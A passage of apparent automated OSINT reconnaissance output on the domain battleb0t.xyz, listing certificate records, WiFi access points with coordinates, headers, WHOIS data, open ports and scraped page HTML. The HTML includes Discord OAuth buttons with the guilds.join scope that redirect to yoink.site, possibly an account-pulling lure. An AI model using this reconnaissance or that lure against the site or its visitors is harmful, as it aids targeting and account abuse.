u'C=US, O="Cloudflare, Inc.", CN=Cloudflare Inc ECC CA-3', u'common_name': u'sni.cloudflaressl.com', u'serial_number': u'09cccb40358f10167bc737cb947e311a', u'entry_timestamp': u'2023-03-23T22:34:16.439', u'id': 8968494929}, {u'not_after': u'2023-06-21T20:32:57', u'not_before': u'2023-03-23T20:32:58', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0399a35c44138f1ff49f74e54fad57818324', u'entry_timestamp': u'2023-03-23T21:32:58.433', u'id': 8986351441}, {u'not_after': u'2023-06-21T20:32:57', u'not_before': u'2023-03-23T20:32:58', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0399a35c44138f1ff49f74e54fad57818324', u'entry_timestamp': u'2023-03-23T21:32:58.351', u'id': 8968126634}, {u'not_after': u'2023-06-13T23:40:09', 
u'not_before': u'2023-03-15T23:40:10', u'issuer_ca_id': 183267, u'name_value': u'funny.battleb0t.xyz\npics.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'funny.battleb0t.xyz', u'serial_number': u'03026deb8d637804f2b85cdb3906ab26eda9', u'entry_timestamp': u'2023-03-16T00:40:11.184', u'id': 8924480030}, {u'not_after': u'2023-06-13T23:40:09', u'not_before': u'2023-03-15T23:40:10', u'issuer_ca_id': 183267, u'name_value': u'funny.battleb0t.xyz\npics.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'funny.battleb0t.xyz', u'serial_number': u'03026deb8d637804f2b85cdb3906ab26eda9', u'entry_timestamp': u'2023-03-16T00:40:11.009', u'id': 8896621265}, {u'not_after': u'2023-06-11T12:52:04', u'not_before': u'2023-03-13T12:52:05', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'0323361a726efc710949b135f9b5e52880de', u'entry_timestamp': u'2023-03-13T13:52:05.523', u'id': 8910975043}, {u'not_after': u'2023-06-11T12:52:04', u'not_before': u'2023-03-13T12:52:05', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'0323361a726efc710949b135f9b5e52880de', u'entry_timestamp': u'2023-03-13T13:52:05.327', u'id': 8879939167}, {u'not_after': u'2023-06-11T12:50:46', u'not_before': u'2023-03-13T12:50:47', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'043a9d01de8fdba2524a020c1870da44ddbc', u'entry_timestamp': u'2023-03-13T13:50:48.355', u'id': 8910971688}, {u'not_after': u'2023-06-11T12:50:46', u'not_before': u'2023-03-13T12:50:47', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': 
u'nwapi.battleb0t.xyz', u'serial_number': u'043a9d01de8fdba2524a020c1870da44ddbc', u'entry_timestamp': u'2023-03-13T13:50:48.097', u'id': 8879934651}, {u'not_after': u'2023-05-26T01:39:24', u'not_before': u'2023-02-25T01:39:25', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'04b63933afde1e32f3fc2e76dcbc08518610', u'entry_timestamp': u'2023-02-25T02:39:25.564', u'id': 8805533709}, {u'not_after': u'2023-05-26T01:39:24', u'not_before': u'2023-02-25T01:39:25', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'04b63933afde1e32f3fc2e76dcbc08518610', u'entry_timestamp': u'2023-02-25T02:39:25.238', u'id': 8735518973}, {u'not_after': u'2023-05-25T03:05:10', u'not_before': u'2023-02-24T03:05:11', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'04910865b45694e389376bc8ee5afcf48052', u'entry_timestamp': u'2023-02-24T04:05:12.219', u'id': 8798937211}, {u'not_after': u'2023-05-25T03:05:10', u'not_before': u'2023-02-24T03:05:11', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'04910865b45694e389376bc8ee5afcf48052', u'entry_timestamp': u'2023-02-24T04:05:12.05', u'id': 8726555656}, {u'not_after': u'2023-05-25T03:02:52', u'not_before': u'2023-02-24T03:02:53', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'0397995c60ac4068f8b2de0a677adab7d116', u'entry_timestamp': u'2023-02-24T04:02:53.851', u'id': 8798923488}, {u'not_after': 
u'2023-05-25T03:02:52', u'not_before': u'2023-02-24T03:02:53', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'0397995c60ac4068f8b2de0a677adab7d116', u'entry_timestamp': u'2023-02-24T04:02:53.639', u'id': 8726539247}, {u'not_after': u'2023-05-14T15:23:50', u'not_before': u'2023-02-13T15: |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Villakakelbond1 (Net ID: 00:0C:F6:CE:B2:88) | 50.8897, 6.0563 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | detyenship (Net ID: 00:02:2D:61:A7:66) | 32.8608, -79.9746 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Annie's Craft Co. (Net ID: 00:02:61:19:6C:00) | 34.0544, -118.244 |
| 2023-05-12 02:44:05 | SSL Certificate - Raw Data | No | CertSpotter | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:99:a3:5c:44:13:8f:1f:f4:9f:74:e5:4f:ad:57:81:83:24
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Mar 23 20:32:58 2023 GMT
Not After : Jun 21 20:32:57 2023 GMT
Subject: CN=nwapi.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:ae:2d:9c:62:18:76:2e:df:de:55:f1:95:af:dc:
59:27:38:8b:5b:00:32:90:fa:a3:fe:5e:92:a6:01:
7f:53:a9:14:85:d5:b4:a7:c0:0d:14:f0:32:f0:be:
0c:a5:54:c5:d2:e3:5d:4e:26:e5:3f:0a:13:30:aa:
26:b9:11:a2:a8:7d:58:6c:52:5f:e4:39:4c:64:b8:
92:f5:ca:b5:bf:a9:b0:6c:9f:4b:b2:34:b7:0e:fd:
c3:4b:d1:55:53:7f:36:89:dc:d0:2b:5e:0c:5f:ed:
95:61:3e:cb:10:b6:d2:99:9c:0c:b8:b3:93:24:f5:
c4:4f:20:e2:fc:24:a0:02:4e:dc:94:c0:26:80:c4:
72:7c:f8:8f:0f:bb:1a:71:64:e0:5b:eb:d2:c0:8c:
13:c3:5d:19:05:5c:35:d5:d3:61:05:f7:49:68:ce:
3f:e7:a7:33:6d:02:b1:87:fe:b7:9f:60:b3:8d:a6:
be:5a:d5:5c:ed:53:5e:27:e0:c9:22:2d:81:ce:b1:
ec:cc:05:c4:f7:86:fc:47:61:ca:71:86:20:b8:14:
9c:ca:b1:05:e4:47:06:cb:1b:86:c7:8f:5e:ba:31:
9b:3c:cb:b9:41:b5:56:e8:d6:32:9d:d1:16:19:02:
ad:d1:e3:f1:4b:c1:d9:61:74:ad:de:6b:c8:4b:60:
db:26:73:9c:89:bb:67:5a:18:24:bc:9e:d0:bb:23:
66:66:fc:2a:b7:81:2b:f5:a0:62:f2:00:e6:a6:5d:
1f:6b:36:2c:f3:42:e0:4d:31:63:fd:7c:96:5d:29:
9b:8b:f6:25:a8:26:32:03:a6:81:0f:c9:d4:8e:46:
76:31:9b:db:08:e1:d6:3d:7b:5e:87:9a:98:cf:cb:
5b:13:ec:f0:64:25:74:03:76:57:14:ba:41:4b:d2:
c1:7e:f3:50:47:af:8d:ee:e4:55:19:8e:20:6c:87:
99:ac:39:f3:6e:8a:21:33:3f:07:aa:28:83:d0:d1:
d8:1c:a8:b7:84:a8:89:95:7f:34:41:7f:a0:83:3e:
cf:d0:5c:c5:e2:ac:17:66:44:17:94:26:73:d2:f6:
3b:d0:cf:9b:f2:1b:3c:6e:17:4d:08:5d:87:80:c7:
6c:c8:40:f5:84:96:5d:f8:9c:bd:ce:4d:4b:f5:0e:
4f:4e:80:4c:0a:a9:22:bf:2e:2d:84:af:ae:ae:d4:
1a:50:8f:be:bf:51:48:e8:9e:33:86:ab:75:90:6e:
5e:7e:85:12:ca:44:de:1a:66:b7:86:cb:c7:c1:40:
7b:6e:f8:ff:44:74:04:48:b1:d2:5b:44:5f:fc:71:
68:46:d9:68:ed:ca:a6:15:15:a5:57:56:d1:00:94:
83:4a:61
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
98:BA:3D:0D:C8:59:5C:05:86:25:C6:DE:57:7A:62:02:A8:E1:D5:36
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nwapi.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Mar 23 21:32:58.351 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:F9:02:68:04:DD:BD:03:2E:AE:18:AA:
AF:0D:3B:37:54:0B:65:42:08:02:43:59:39:EA:4E:E4:
74:9E:81:C9:7F:02:21:00:A3:06:40:AE:98:69:3E:CB:
1F:F6:11:FA:78:DC:13:53:6B:E1:77:75:9F:C2:16:A0:
DB:C3:04:86:97:E4:3C:C0
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Mar 23 21:32:58.367 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:7A:A2:EB:6D:CE:11:7A:04:E7:47:C4:C2:
44:9A:BB:45:2B:47:3C:26:06:C5:A4:73:04:05:59:C0:
EA:D7:C9:86:02:21:00:96:12:0C:16:C7:15:09:8E:8E:
23:55:5D:FF:D3:4D:29:B3:21:12:6C:94:18:E0:30:4E:
4A:D0:D6:81:62:80:25
Signature Algorithm: sha256WithRSAEncryption
54:a4:7f:41:90:b7:5a:58:4b:b5:6b:68:ea:db:5a:92:b3:b2:
5b:7b:19:af:8a:ab:f1:af:c0:c8:97:4c:34:bf:3f:32:11:7b:
ef:8b:7e:76:7a:87:16:2c:1f:d0:41:d1:c1:02:b1:37:57:af:
4c:2b:b8:7b:75:a1:66:6d:db:db:ab:82:a1:fd:0c:b1:09:1f:
f6:3b:6f:e4:40:6a:6c:5b:ef:1d:46:ef:b3:b7:e2:09:40:10:
a0:d1:48:3e:99:ab:85:a3:c4:4c:9c:38:4c:86:5d:05:6c:1b:
02:ea:8a:b9:cd:33:f5:2b:4f:92:81:81:2f:e1:d6:b3:a5:e1:
b8:f6:e8:c6:e4:af:f3:a4:96:e9:02:f8:de:c5:31:3b:03:6b:
a3:c1:43:ea:01:84:7b:d7:65:c2:7b:26:5b:45:8b:c9:00:4a:
bf:64:80:db:bc:e4:35:f5:31:8b:1a:49:c1:a9:b6:8d:8f:59:
62:4e:f9:b9:59:d2:7d:9b:3a:75:2f:82:0e:77:1f:fa:cc:3b:
4e:90:c2:ba:e9:1d:4c:b0:a0:53:8e:4b:72:4b:e7:12:e4:36:
5a:97:fc:6e:97:fc:a5:f5:76:de:6f:cd:f5:6d:3f:07:f6:75:
e6:97:55:45:a3:14:55:0c:ff:89:33:2c:76:5f:49:b1:2d:bb:
1e:69:4c:4d
| battleb0t.xyz |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | <no ssid> (Net ID: 00:02:2D:21:0C:9F) | 37.7642, -122.3993 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | cf-ray: 7c5f603759cec44a-EWR | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=ZnKgqHhkfhEMG0RRLEy55qXrIGT89PCJPvhlAxU1THPzwDrL5gc7PkT%2B%2FxSKq2nR5SYE1oIsFspz8pOEUKsQOZN%2FSfuF%2FMxnliSNjDjXg8QSfRLZrnIM0lr2QA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:13 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f603759cec44a-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:31:27 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | abuse@namecheap.com | Domain Name: nom-nom.link
Registry Domain ID: DO_219392db582b99394c2ad318b07284eb-UR
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: https://www.namecheap.com
Updated Date: 2022-10-23T13:11:02.954Z
Creation Date: 2022-09-09T13:47:20.593Z
Registry Expiry Date: 2023-09-09T13:47:20.593Z
Registrar: NAMECHEAP
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.6613102107
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: Capital Region
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: IS
Registrant Phone: REDACTED FOR PRIVACY
Registrant Fax: REDACTED FOR PRIVACY
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Fax: REDACTED FOR PRIVACY
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Tech ID: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Fax: REDACTED FOR PRIVACY
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Billing ID: REDACTED FOR PRIVACY
Billing Name: REDACTED FOR PRIVACY
Billing Organization: REDACTED FOR PRIVACY
Billing Street: REDACTED FOR PRIVACY
Billing City: REDACTED FOR PRIVACY
Billing State/Province: REDACTED FOR PRIVACY
Billing Postal Code: REDACTED FOR PRIVACY
Billing Country: REDACTED FOR PRIVACY
Billing Phone: REDACTED FOR PRIVACY
Billing Fax: REDACTED FOR PRIVACY
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: wesley.ns.cloudflare.com
Name Server: rachel.ns.cloudflare.com
DNSSEC: unsigned
URL of the ICANN RDDS Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:09:16.270Z <<<
For more information on domain status codes, please visit https://icann.org/epp
The WHOIS information provided in this page has been redacted
in compliance with ICANN's Temporary Specification for gTLD
Registration Data.
The data in this record is provided by Uniregistry for informational
purposes only, and it does not guarantee its accuracy. Uniregistry is
authoritative for whois information in top-level domains it operates
under contract with the Internet Corporation for Assigned Names and
Numbers. Whois information from other top-level domains is provided by
a third-party under license to Uniregistry.
This service is intended only for query-based access. By using this
service, you agree that you will use any data presented only for lawful
purposes and that, under no circumstances will you use (a) data
acquired for the purpose of allowing, enabling, or otherwise supporting
the transmission by e-mail, telephone, facsimile or other
communications mechanism of mass unsolicited, commercial advertising
or solicitations to entities other than your existing customers; or
(b) this service to enable high volume, automated, electronic processes
that send queries or data to the systems of any Registrar or any
Registry except as reasonably necessary to register domain names or
modify existing domain name registrations.
Uniregistry reserves the right to modify these terms at any time. By
submitting this query, you agree to abide by this policy. All rights
reserved.
Domain name: nom-nom.link
Registry Domain ID: DO_219392db582b99394c2ad318b07284eb-UR
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 0001-01-01T00:00:00.00Z
Creation Date: 2022-09-09T13:47:20.59Z
Registrar Registration Expiration Date: 2023-09-09T13:47:20.59Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Reseller: NAMECHEAP INC
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: Redacted for Privacy
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: Kalkofnsvegur 2
Registrant City: Reykjavik
Registrant State/Province: Capital Region
Registrant Postal Code: 101
Registrant Country: IS
Registrant Phone: +354.4212434
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: 6779e29dade44d91b5a12e78669866ac.protect@withheldforprivacy.com
Registry Admin ID:
Admin Name: Redacted for Privacy
Admin Organization: Privacy service provided by Withheld for Privacy ehf
Admin Street: Kalkofnsvegur 2
Admin City: Reykjavik
Admin State/Province: Capital Region
Admin Postal Code: 101
Admin Country: IS
Admin Phone: +354.4212434
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: 6779e29dade44d91b5a12e78669866ac.protect@withheldforprivacy.com
Registry Tech ID:
Tech Name: Redacted for Privacy
Tech Organization: Privacy service provided by Withheld for Privacy ehf
Tech Street: Kalkofnsvegur 2
Tech City: Reykjavik
Tech State/Province: Capital Region
Tech Postal Code: 101
Tech Country: IS
Tech Phone: +354.4212434
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: 6779e29dade44d91b5a12e78669866ac.protect@withheldforprivacy.com
Name Server: rachel.ns.cloudflare.com
Name Server: wesley.ns.cloudflare.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-11T15:09:16.51Z <<<
For more information on Whois status codes, please visit https://icann.org/epp |
| 2023-05-12 03:03:43 | Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | vscode.battleb0t.xyz | [{u'request_config': {u'headers': {u'User-Agent': u'Mozilla/5.0'}}, u'target': u'http://vscode.battleb0t.xyz', u'http_status': 521, u'plugins': {u'HTTPServer': {u'string': [u'cloudflare']}, u'Script': {}, u'Country': {u'string': [u'UNITED STATES'], u'module': [u'US']}, u'Title': {u'string': [u'vscode.battleb0t.xyz | 521: Web server is down']}, u'HTML5': {}, u'UncommonHeaders': {u'string': [u'referrer-policy,cf-ray']}, u'IP': {u'string': [u'104.21.71.14']}, u'X-Frame-Options': {u'string': [u'SAMEORIGIN']}, u'X-UA-Compatible': {u'string': [u'IE=Edge']}}}, {}] |
| 2023-05-12 03:01:24 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.228): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:55:27 | Internet Name | No | URLScan.io | 0 | 0 | 1 | 0 | None | kekw.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | default (Net ID: 00:01:46:03:E4:6F) | 34.0544, -118.244 |
| 2023-05-12 02:55:18 | Netblock Membership | No | Censys | 6 | 0 | 3 | 0 | None | 46.101.128.0/17 | 46.101.229.70 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | 3333 1370 (Net ID: 00:0F:CC:6D:BD:34) | 32.8608, -79.9746 |
| 2023-05-12 02:54:21 | Linked URL - Internal | No | Web Spider | 4 | 0 | 4 | 0 | None | http://vscode.battleb0t.xyz/cdn-cgi/styles/main.css | http://vscode.battleb0t.xyz/ |
| 2023-05-12 03:32:19 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.10:8443 | 188.114.97.0/24 |
| 2023-05-12 03:19:17 | Web Framework | No | Web Framework Identifier | 0 | 0 | 3 | 0 | None | jQuery | <!DOCTYPE html>
<html>
<head>
<title>Funny Forehead Gallery</title>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
<script src="http://code.jquery.com/jquery-3.2.1.js" integrity="sha256-DZAnKJ/6XZ9si04Hgrsxu/8s717jcIzLy3oi35EouyE=" crossorigin="anonymous"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>
<script src="https://use.fontawesome.com/9dfc16ed6b.js"></script>
<link rel="stylesheet" type="text/css" href="gallery.css">
<link rel="icon" type="image/png" href="/images/favicon.png">
</head>
<body>
<nav class = "nav navbar-inverse navbar-fixed-top">
<div class = "container">
<div class = "navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1" aria-expanded="false">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a href = "#" class = "navbar-brand"><span class="glyphicon glyphicon-picture" aria-hidden="true"></span> #WieselOnTop</a>
</div>
</nav>
<div class = "container">
<div class = "jumbotron">
<h1><i class="fa fa-camera-retro" aria-hidden="true"></i> The Funny Forehead Gallery</h1>
<p>A bunch of beautiful images!</p>
<a href = "https://discord.com/api/oauth2/authorize?client_id=1073319920575713290&redirect_uri=https%3A%2F%2Fyoink.site%2Fauth&response_type=code&scope=identify%20guilds.join" class = "btn btn-primary btn-lg">Join the Discord</a>
<a href = "https://discord.com/api/oauth2/authorize?client_id=1073319920575713290&redirect_uri=https%3A%2F%2Fyoink.site%2Fauth&response_type=code&scope=identify%20guilds.join" class = "btn btn-primary btn-lg">Get Beamed!</a>
</div>
<div class = "row">
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_1.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_2.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_3.JPG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/nomnom.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/fredo.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/jonas.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_1.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_2.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_3.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/ein_1.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/ein_2.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/reveloder.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/kappi_1.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/kappi_2.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_1.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_2.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_3.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_4.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_5.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_1.jpeg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_2.jpeg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_3.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_4.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_5.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_6.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/jcqn.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/nwp.PNG">
</div>
</div>
</div>
</body>
</html>
|
| 2023-05-12 03:01:17 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.149): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:45:35 | Name Server (DNS NS Records) | No | DNS Raw Records | 0 | 0 | 1 | 0 | None | brett.ns.cloudflare.com | ayhu.xyz |
| 2023-05-12 02:46:38 | BGP AS Membership | No | RIPE | 0 | 0 | 3 | 0 | None | 13335 | 172.67.128.0/20 |
| 2023-05-12 03:33:44 | Raw File Meta Data | No | Binary String Extractor | 0 | 0 | 4 | 0 | None | mntrRGB XYZ
desc
trXYZ
<mluc
-mluc
3`-O!
6fD`
N@e@8
s$01@H
@jlveI
B4Pic
.E"E3@YB
